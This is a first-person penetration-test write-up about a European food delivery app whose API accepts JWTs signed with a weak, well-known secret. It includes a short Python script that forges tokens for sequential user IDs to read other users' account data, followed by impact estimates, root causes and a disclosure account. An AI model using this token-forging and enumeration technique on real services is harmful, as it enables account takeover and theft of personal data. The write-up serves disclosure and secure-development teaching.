It started as a routine penetration test. Little did I know I was about to uncover one of the most basic yet catastrophic security vulnerabilities imaginable in a company with 11.8 million users and $140 million in Series B funding.
While testing their mobile API, Burp Suite flagged something that made me do a double-take:
Critical: JWT signed using well-known HMAC secret key. The key used was: XXXXMy first reaction was disbelief. Surely this had to be a false positive.
The Proof
I decided to verify the finding. Using their own JWT structure:
{
"iss": "redacted",
"expwe": 90001760027408,
"userId": 1813038, (*)
"iyat": 1760027408,
"sss": 17460027408
}With the secret "XXXX", I generated a token and accessed their /v1/auth/ endpoint. It worked. Then came the terrifying realization - I could access ANY user's account by simply changing the userId parameter.
The Escalation
I wrote a simple Python script to demonstrate the impact:
import jwt
import requests
SECRET = "XXXX"
for user_id in range(1, 11):
token = jwt.encode(
{"iss": "redacted", "expwe": 90001760027408, "userId": user_id, "iyat": 1760027408, "sss": 22388318313},
SECRET,
algorithm="HS256"
)
headers = {"Authorization": f"Bearer {token}"}
resp = requests.get("https://api-vxx.redacted.com/v1/auth/", headers=headers)
if resp.status_code == 200:
print(f" Access to User ID {user_id}")
user_data = resp.json()
print(f" User details: {user_data}")The results were staggering. I could access user accounts sequentially, including what appeared to be administrative accounts. (without rate limit any bearer, any captcha token…)
The Business Impact
The Company Profile:
- Series B: $140 million raised
- User Base: 11.8 million customers
- Industry: Food delivery and grocery service
- Location: Europe
The Data at Risk:
- Personal Identifiable Information (PII)
- Phone numbers and addresses
- Order history and preferences
- Payment information patterns
The Economic Value of This Breach
In the black market, this data would be worth millions:
11.8M users × $1–2,5 per record = $12–30 million
But the real damage would be:
- Regulatory fines: Potential GDPR-equivalent violations
- Brand reputation: Irreparable trust damage
- Investor confidence: Future funding at risk
- Customer compensation: Massive liability
The Technical Failure
How does a well-funded tech company make such a basic mistake?
- Development credentials in production: Likely a development secret that never got rotated
- Lack of code review: No senior engineer caught this during PR
- No security scanning: Basic SAST tools would have detected this
- Poor secret management: No proper secret rotation process
Lessons Learned
- Never use weak or default secrets
- Implement proper secret rotation
- Use environment variables for configuration
- Regular security training is essential
- Security is not optional, even for startups
- Code review processes must include security checks
- Regular penetration testing is crucial
- Bug bounty programs can prevent catastrophic breaches
- Always practice responsible disclosure
- Document findings thoroughly
- Provide clear reproduction steps
- Understand the business impact
I immediately reported the vulnerability through their security channel. The response was swift and professional. Within hours, they had:
- Acknowledged the critical severity
- Begun incident response procedures
- Started developing a patch
- Initiated a comprehensive security review
Conclusion
This case study demonstrates that security maturity doesn't always correlate with funding size. A company can raise millions yet fall victim to basic security oversights.
The "XXXX" secret is more than just a technical failure — it's a cultural one. It shows what happens when security isn't embedded in the development lifecycle from day one.
Security is not a feature; it's a fundamental requirement.
Author's Note: This article is based on a real security assessment. Company details have been anonymized to protect their security during the remediation process. Always practice responsible disclosure and help make the internet safer for everyone.
Follow me for more security research and real-world case studies.